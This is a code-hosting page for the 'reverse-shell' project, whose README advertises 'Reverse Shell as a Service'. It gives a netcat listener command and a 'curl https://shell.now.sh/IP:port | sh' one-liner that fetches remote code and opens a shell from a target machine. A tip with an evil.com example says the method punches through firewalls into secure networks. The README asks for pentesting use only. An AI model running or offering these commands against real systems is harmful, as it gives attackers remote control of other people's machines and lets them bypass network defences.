You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
Luke Childs
83564a207e
|
7 years ago | |
---|---|---|
src | 7 years ago | |
test | 7 years ago | |
.gitignore | 7 years ago | |
.travis.yml | 7 years ago | |
LICENSE | 7 years ago | |
README.md | 7 years ago | |
package.json | 7 years ago |
README.md
reverse-shell
Reverse Shell as a Service
Easy to remember reverse shell that should work on most Unix-like systems.
Usage
1. Listen for connection
On your machine, open up a port and listen on it. You can do this easily with netcat.
nc -l 1337
2. Execute reverse shell on target
On the target machine, pipe the output of https://shell.now.sh/yourip:port into sh.
curl https://shell.now.sh/192.168.0.69:1337 | sh
3. Don't be a dick
This is meant to be used for pentesting or helping coworkers understand why they should always lock their computers. Please don't use this for anything malicious.
Demo
Tip
You can use a hostname or an IP. Because this is a reverse connection it can punch through firewalls and connect to the internet.
e.g You could listen for connections on a server at evil.com and get a reverse shell from inside a secure network with:
curl https://shell.now.sh/evil.com:1337 | sh
License
MIT © Luke Childs